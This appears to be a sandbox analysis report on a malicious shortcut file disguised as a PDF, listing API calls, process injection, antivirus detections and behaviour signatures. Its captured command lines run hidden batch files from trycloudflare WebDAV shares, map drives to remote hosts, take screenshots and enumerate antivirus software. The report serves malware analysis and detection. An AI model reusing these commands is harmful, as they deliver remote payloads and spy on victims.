NtProtectVirtualMemory | process_identifier: 2812 | stack_dep_bypass: 0 | stack_pivoted: 0 | heap_dep_bypass: 0 | length: 4096 | protection: 64 (PAGE_EXECUTE_READWRITE) | base_address: 0x71cd1000 | process_handle: 0xffffffff | 1 0 0
NtAllocateVirtualMemory | process_identifier: 2812 | region_size: 4096 | stack_dep_bypass: 0 | stack_pivoted: 0 | heap_dep_bypass: 1 | protection: 64 (PAGE_EXECUTE_READWRITE) | base_address: 0x020ba000 | allocation_type: 4096 (MEM_COMMIT) | process_handle: 0xffffffff | 1 0 0
NtProtectVirtualMemory | process_identifier: 2812 | stack_dep_bypass: 0 | stack_pivoted: 0 | heap_dep_bypass: 0 | length: 8192 | protection: 64 (PAGE_EXECUTE_READWRITE) | base_address: 0x71cd2000 | process_handle: 0xffffffff | 1 0 0
NtAllocateVirtualMemory | process_identifier: 2812 | region_size: 4096 | stack_dep_bypass: 0 | stack_pivoted: 0 | heap_dep_bypass: 1 | protection: 64 (PAGE_EXECUTE_READWRITE) | base_address: 0x020b2000 | allocation_type: 4096 (MEM_COMMIT) | process_handle: 0xffffffff | 1 0 0
NtAllocateVirtualMemory | process_identifier: 2812 | region_size: 4096 | stack_dep_bypass: 0 | stack_pivoted: 0 | heap_dep_bypass: 1 | protection: 64 (PAGE_EXECUTE_READWRITE) | base_address: 0x02102000 | allocation_type: 4096 (MEM_COMMIT) | process_handle: 0xffffffff | 1 0 0
NtAllocateVirtualMemory | process_identifier: 2812 | region_size: 4096 | stack_dep_bypass: 0 | stack_pivoted: 0 | heap_dep_bypass: 1 | protection: 64 (PAGE_EXECUTE_READWRITE) | base_address: 0x02b41000 | allocation_type: 4096 (MEM_COMMIT) | process_handle: 0xffffffff | 1 0 0
NtAllocateVirtualMemory | process_identifier: 2812 | region_size: 8192 | stack_dep_bypass: 0 | stack_pivoted: 0 | heap_dep_bypass: 1 | protection: 64 (PAGE_EXECUTE_READWRITE) | base_address: 0x02b42000 | allocation_type: 4096 (MEM_COMMIT) | process_handle: 0xffffffff | 1 0 0
NtAllocateVirtualMemory | process_identifier: 2812 | region_size: 4096 | stack_dep_bypass: 0 | stack_pivoted: 0 | heap_dep_bypass: 1 | protection: 64 (PAGE_EXECUTE_READWRITE) | base_address: 0x0212a000 | allocation_type: 4096 (MEM_COMMIT) | process_handle: 0xffffffff | 1 0 0
NtAllocateVirtualMemory | process_identifier: 2812 | region_size: 4096 | stack_dep_bypass: 0 | stack_pivoted: 0 | heap_dep_bypass: 1 | protection: 64 (PAGE_EXECUTE_READWRITE) | base_address: 0x02103000 | allocation_type: 4096 (MEM_COMMIT) | process_handle: 0xffffffff | 1 0 0
NtAllocateVirtualMemory | process_identifier: 2812 | region_size: 4096 | stack_dep_bypass: 0 | stack_pivoted: 0 | heap_dep_bypass: 1 | protection: 64 (PAGE_EXECUTE_READWRITE) | base_address: 0x02104000 | allocation_type: 4096 (MEM_COMMIT) | process_handle: 0xffffffff | 1 0 0
NtAllocateVirtualMemory | process_identifier: 2812 | region_size: 4096 | stack_dep_bypass: 0 | stack_pivoted: 0 | heap_dep_bypass: 1 | protection: 64 (PAGE_EXECUTE_READWRITE) | base_address: 0x0213b000 | allocation_type: 4096 (MEM_COMMIT) | process_handle: 0xffffffff | 1 0 0
NtAllocateVirtualMemory | process_identifier: 2812 | region_size: 4096 | stack_dep_bypass: 0 | stack_pivoted: 0 | heap_dep_bypass: 1 | protection: 64 (PAGE_EXECUTE_READWRITE) | base_address: 0x02137000 | allocation_type: 4096 (MEM_COMMIT) | process_handle: 0xffffffff | 1 0 0
NtAllocateVirtualMemory | process_identifier: 2812 | region_size: 4096 | stack_dep_bypass: 0 | stack_pivoted: 0 | heap_dep_bypass: 1 | protection: 64 (PAGE_EXECUTE_READWRITE) | base_address: 0x020bb000 | allocation_type: 4096 (MEM_COMMIT) | process_handle: 0xffffffff | 1 0 0
NtAllocateVirtualMemory | process_identifier: 2812 | region_size: 4096 | stack_dep_bypass: 0 | stack_pivoted: 0 | heap_dep_bypass: 1 | protection: 64 (PAGE_EXECUTE_READWRITE) | base_address: 0x02122000 | allocation_type: 4096 (MEM_COMMIT) | process_handle: 0xffffffff | 1 0 0
NtAllocateVirtualMemory | process_identifier: 2812 | region_size: 4096 | stack_dep_bypass: 0 | stack_pivoted: 0 | heap_dep_bypass: 1 | protection: 64 (PAGE_EXECUTE_READWRITE) | base_address: 0x02135000 | allocation_type: 4096 (MEM_COMMIT) | process_handle: 0xffffffff | 1 0 0
NtAllocateVirtualMemory | process_identifier: 2812 | region_size: 4096 | stack_dep_bypass: 0 | stack_pivoted: 0 | heap_dep_bypass: 1 | protection: 64 (PAGE_EXECUTE_READWRITE) | base_address: 0x02105000 | allocation_type: 4096 (MEM_COMMIT) | process_handle: 0xffffffff | 1 0 0
NtAllocateVirtualMemory | process_identifier: 2812 | region_size: 4096 | stack_dep_bypass: 0 | stack_pivoted: 0 | heap_dep_bypass: 1 | protection: 64 (PAGE_EXECUTE_READWRITE) | base_address: 0x0212c000 | allocation_type: 4096 (MEM_COMMIT) | process_handle: 0xffffffff | 1 0 0
NtAllocateVirtualMemory | process_identifier: 2812 | region_size: 4096 | stack_dep_bypass: 0 | stack_pivoted: 0 | heap_dep_bypass: 1 | protection: 64 (PAGE_EXECUTE_READWRITE) | base_address: 0x02ca0000 | allocation_type: 4096 (MEM_COMMIT) | process_handle: 0xffffffff | 1 0 0
NtAllocateVirtualMemory | process_identifier: 2812 | region_size: 4096 | stack_dep_bypass: 0 | stack_pivoted: 0 | heap_dep_bypass: 1 | protection: 64 (PAGE_EXECUTE_READWRITE) | base_address: 0x02106000 | allocation_type: 4096 (MEM_COMMIT) | process_handle: 0xffffffff | 1 0 0
NtAllocateVirtualMemory | process_identifier: 2812 | region_size: 4096 | stack_dep_bypass: 0 | stack_pivoted: 0 | heap_dep_bypass: 1 | protection: 64 (PAGE_EXECUTE_READWRITE) | base_address: 0x0213c000 | allocation_type: 4096 (MEM_COMMIT) | process_handle: 0xffffffff | 1 0 0
NtAllocateVirtualMemory | process_identifier: 2812 | region_size: 4096 | stack_dep_bypass: 0 | stack_pivoted: 0 | heap_dep_bypass: 1 | protection: 64 (PAGE_EXECUTE_READWRITE) | base_address: 0x02123000 | allocation_type: 4096 (MEM_COMMIT) | process_handle: 0xffffffff | 1 0 0
NtAllocateVirtualMemory | process_identifier: 2812 | region_size: 4096 | stack_dep_bypass: 0 | stack_pivoted: 0 | heap_dep_bypass: 1 | protection: 64 (PAGE_EXECUTE_READWRITE) | base_address: 0x02124000 | allocation_type: 4096 (MEM_COMMIT) | process_handle: 0xffffffff | 1 0 0
NtAllocateVirtualMemory | process_identifier: 2812 | region_size: 4096 | stack_dep_bypass: 0 | stack_pivoted: 0 | heap_dep_bypass: 1 | protection: 64 (PAGE_EXECUTE_READWRITE) | base_address: 0x02125000 | allocation_type: 4096 (MEM_COMMIT) | process_handle: 0xffffffff | 1 0 0
NtAllocateVirtualMemory | process_identifier: 2812 | region_size: 4096 | stack_dep_bypass: 0 | stack_pivoted: 0 | heap_dep_bypass: 1 | protection: 64 (PAGE_EXECUTE_READWRITE) | base_address: 0x02126000 | allocation_type: 4096 (MEM_COMMIT) | process_handle: 0xffffffff | 1 0 0
NtAllocateVirtualMemory | process_identifier: 2812 | region_size: 4096 | stack_dep_bypass: 0 | stack_pivoted: 0 | heap_dep_bypass: 1 | protection: 64 (PAGE_EXECUTE_READWRITE) | base_address: 0x02127000 | allocation_type: 4096 (MEM_COMMIT) | process_handle: 0xffffffff | 1 0 0
NtAllocateVirtualMemory | process_identifier: 2812 | region_size: 4096 | stack_dep_bypass: 0 | stack_pivoted: 0 | heap_dep_bypass: 1 | protection: 64 (PAGE_EXECUTE_READWRITE) | base_address: 0x02128000 | allocation_type: 4096 (MEM_COMMIT) | process_handle: 0xffffffff | 1 0 0
NtAllocateVirtualMemory | process_identifier: 2812 | region_size: 4096 | stack_dep_bypass: 0 | stack_pivoted: 0 | heap_dep_bypass: 1 | protection: 64 (PAGE_EXECUTE_READWRITE) | base_address: 0x02129000 | allocation_type: 4096 (MEM_COMMIT) | process_handle: 0xffffffff | 1 0 0
NtAllocateVirtualMemory | process_identifier: 2812 | region_size: 4096 | stack_dep_bypass: 0 | stack_pivoted: 0 | heap_dep_bypass: 1 | protection: 64 (PAGE_EXECUTE_READWRITE) | base_address: 0x04e40000 | allocation_type: 4096 (MEM_COMMIT) | process_handle: 0xffffffff | 1 0 0
NtAllocateVirtualMemory | process_identifier: 2812 | region_size: 4096 | stack_dep_bypass: 0 | stack_pivoted: 0 | heap_dep_bypass: 1 | protection: 64 (PAGE_EXECUTE_READWRITE) | base_address: 0x04e41000 | allocation_type: 4096 (MEM_COMMIT) | process_handle: 0xffffffff | 1 0 0
NtAllocateVirtualMemory | process_identifier: 2812 | region_size: 4096 | stack_dep_bypass: 0 | stack_pivoted: 0 | heap_dep_bypass: 1 | protection: 64 (PAGE_EXECUTE_READWRITE) | base_address: 0x04e42000 | allocation_type: 4096 (MEM_COMMIT) | process_handle: 0xffffffff | 1 0 0

NtAllocateVirtualMemory

process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e43000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e44000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e45000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e46000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e47000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e48000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e49000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e4a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e4b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e4c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e4d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e4e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e4f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e51000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceExW

total_number_of_free_bytes: 9115271168
free_bytes_available: 9115271168
root_path: U:\
total_number_of_bytes: 34252779520
1 1 0
file C:\Users\test22\AppData\Local\Temp\doc01585520250114102531.pdf.lnk
file C:\Windows\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\system32\cmd.exe" /k "\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\rx.bat" hidden
cmdline "C:\Windows\system32\cmd.exe" /c "\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\tra.bat" hidden
cmdline powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/k \"\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\rx.bat\" hidden' -WindowStyle Hidden"
cmdline "C:\Windows\System32\cmd.exe" /c start /min \\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\final.bat
cmdline C:\Windows\System32\cmd.exe /c "\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\tra.bat" hidden
cmdline C:\Windows\system32\cmd.exe /K \\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\rx.bat
cmdline powershell -Command "[System.Net.Dns]::GetHostName()"
cmdline powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/c \"\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\tra.bat\" hidden' -WindowStyle Hidden"
cmdline C:\Windows\System32\cmd.exe /k "\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\rx.bat" hidden
cmdline "C:\Windows\System32\cmd.exe" /c start /min \\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\tra.bat
cmdline "C:\Windows\System32\cmd.exe" /c start /min \\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\rx.bat
cmdline powershell -Command "Add-Type -AssemblyName System.Windows.Forms,System.Drawing; $screen = [System.Windows.Forms.Screen]::AllScreens[0]; $bitmap = New-Object Drawing.Bitmap $screen.Bounds.Width, $screen.Bounds.Height; $graphics = [System.Drawing.Graphics]::FromImage($bitmap); $graphics.CopyFromScreen($screen.Bounds.Location, [System.Drawing.Point]::Empty, $screen.Bounds.Size); $bitmap.Save('C:\Users\test22\AppData\Local\Temp\test22-PC_screenshot.png', [System.Drawing.Imaging.ImageFormat]::Png);"
cmdline powershell -Command "Expand-Archive -Path 'C:\Users\test22\Contacts\zone.zip' -DestinationPath 'C:\Users\test22\Contacts' -Force"
cmdline C:\Windows\system32\cmd.exe /c powershell -Command "Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct | Select-Object -ExpandProperty displayName" 2>nul
cmdline powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/c \"\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\final.bat\" hidden' -WindowStyle Hidden"
cmdline C:\Windows\system32\cmd.exe /c powershell -Command "[System.Net.Dns]::GetHostName()"
cmdline C:\Windows\system32\cmd.exe /K \\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\final.bat
cmdline "C:\Windows\system32\cmd.exe" /c "\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\final.bat" hidden
cmdline powershell -Command "Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct | Select-Object -ExpandProperty displayName"
cmdline C:\Windows\System32\cmd.exe /c "\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\final.bat" hidden
cmdline C:\Windows\system32\cmd.exe /K \\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\tra.bat
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: cmd
parameters: /c start /min \\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\tra.bat
filepath: cmd
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd
parameters: /c start /min \\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\rx.bat
filepath: cmd
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd
parameters: /c start /min \\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\final.bat
filepath: cmd
1 1 0

CreateProcessInternalW

thread_identifier: 2808
thread_handle: 0x00000084
process_identifier: 2812
current_directory: C:\Windows
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/c \"\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\tra.bat\" hidden' -WindowStyle Hidden"
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000008c
1 1 0

CreateProcessInternalW

thread_identifier: 1368
thread_handle: 0x00000088
process_identifier: 1376
current_directory: C:\Windows
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/k \"\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\rx.bat\" hidden' -WindowStyle Hidden"
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000084
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Windows\system32\cmd.exe
parameters: /c "\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\tra.bat" hidden
filepath: C:\Windows\System32\cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Windows\system32\cmd.exe
parameters: /k "\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\rx.bat" hidden
filepath: C:\Windows\System32\cmd.exe
1 1 0

CreateProcessInternalW

thread_identifier: 1324
thread_handle: 0x00000088
process_identifier: 756
current_directory: C:\Windows
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/c \"\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\final.bat\" hidden' -WindowStyle Hidden"
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000084
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Windows\system32\cmd.exe
parameters: /c "\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\final.bat" hidden
filepath: C:\Windows\System32\cmd.exe
1 1 0
ESET-NOD32 a variant of Generik.LKBOMJW
Kaspersky HEUR:Trojan-Downloader.WinLNK.Agent.gen
huorong TrojanDownloader/LNK.Agent.en
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2856
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 16 (PAGE_EXECUTE)
base_address: 0x054c0000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description Create a windows service rule Create_Service
description Communications over RAW Socket rule Network_TCP_Socket
description Communication using DGA rule Network_DGA
description Match Windows Http API call rule Str_Win32_Http_API
description Take ScreenShot rule ScreenShot
description Escalate priviledges rule Escalate_priviledges
description Steal credential rule local_credential_Steal
description PWS Memory rule Generic_PWS_Memory_Zero
description Record Audio rule Sniff_Audio
description Communications over HTTP rule Network_HTTP
description Communications use DNS rule Network_DNS
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description File Downloader rule Network_Downloader
description Match Windows Inet API call rule Str_Win32_Internet_API
description Communications over FTP rule Network_FTP
description Run a KeyLogger rule KeyLogger
description Communications over P2P network rule Network_P2P_Win
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Create a windows service rule Create_Service
description Communications over RAW Socket rule Network_TCP_Socket
description Communication using DGA rule Network_DGA
description Match Windows Http API call rule Str_Win32_Http_API
description Take ScreenShot rule ScreenShot
description Escalate priviledges rule Escalate_priviledges
description Steal credential rule local_credential_Steal
description PWS Memory rule Generic_PWS_Memory_Zero
description Record Audio rule Sniff_Audio
description Communications over HTTP rule Network_HTTP
description Communications use DNS rule Network_DNS
cmdline net use W: "\\characters-contrary-foster-workout.trycloudflare.com@SSL\DavWWWRoot"
cmdline net use U: /delete /yes
cmdline "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
cmdline net use U: "\\divide-snow-pound-clip.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no
cmdline "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2128 CREDAT:145409
file C:\Windows\%oI¼╢e:~27,1%oI¼╢e:~61,1%oI¼╢e:~29,1oI¼╢e:~0,1%oI¼╢e:~10,1%oI¼╢e:~27,1%oI¼╢e:~21,1%
count 1036 name heapspray process powershell.exe total_mb 64 length 65536 protection PAGE_READWRITE
parent_process powershell.exe martian_process "C:\Windows\system32\cmd.exe" /k "\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\rx.bat" hidden
parent_process powershell.exe martian_process C:\Windows\System32\cmd.exe /k "\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\rx.bat" hidden
parent_process wscript.exe martian_process cmd /c start /min \\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\tra.bat
parent_process wscript.exe martian_process cmd /c start /min \\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\rx.bat
parent_process wscript.exe martian_process cmd /c start /min \\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\final.bat
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c start /min \\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\final.bat
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c start /min \\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\tra.bat
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c start /min \\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\rx.bat
parent_process powershell.exe martian_process C:\Windows\System32\cmd.exe /c "\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\final.bat" hidden
parent_process powershell.exe martian_process "C:\Windows\system32\cmd.exe" /c "\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\final.bat" hidden
parent_process powershell.exe martian_process "C:\Windows\system32\cmd.exe" /c "\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\tra.bat" hidden
parent_process powershell.exe martian_process C:\Windows\System32\cmd.exe /c "\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\tra.bat" hidden
Process injection Process 3048 resumed a thread in remote process 1688
Process injection Process 1844 resumed a thread in remote process 1560
Process injection Process 2820 resumed a thread in remote process 2912
Process injection Process 2128 resumed a thread in remote process 2856
Process injection Process 2120 resumed a thread in remote process 2288
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x0000064c
suspend_count: 1
process_identifier: 1688
1 0 0

NtResumeThread

thread_handle: 0x00000088
suspend_count: 0
process_identifier: 1560
1 0 0

NtResumeThread

thread_handle: 0x00000088
suspend_count: 0
process_identifier: 2912
1 0 0

NtResumeThread

thread_handle: 0x00000334
suspend_count: 1
process_identifier: 2856
1 0 0

NtResumeThread

thread_handle: 0x00000088
suspend_count: 0
process_identifier: 2288
1 0 0
option -windowstyle hidden value Attempts to execute command with a hidden window
option -windowstyle hidden value Attempts to execute command with a hidden window
option -windowstyle hidden value Attempts to execute command with a hidden window
file C:\Windows\SysWOW64\wscript.exe
file C:\Windows\System32\cmd.exe
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe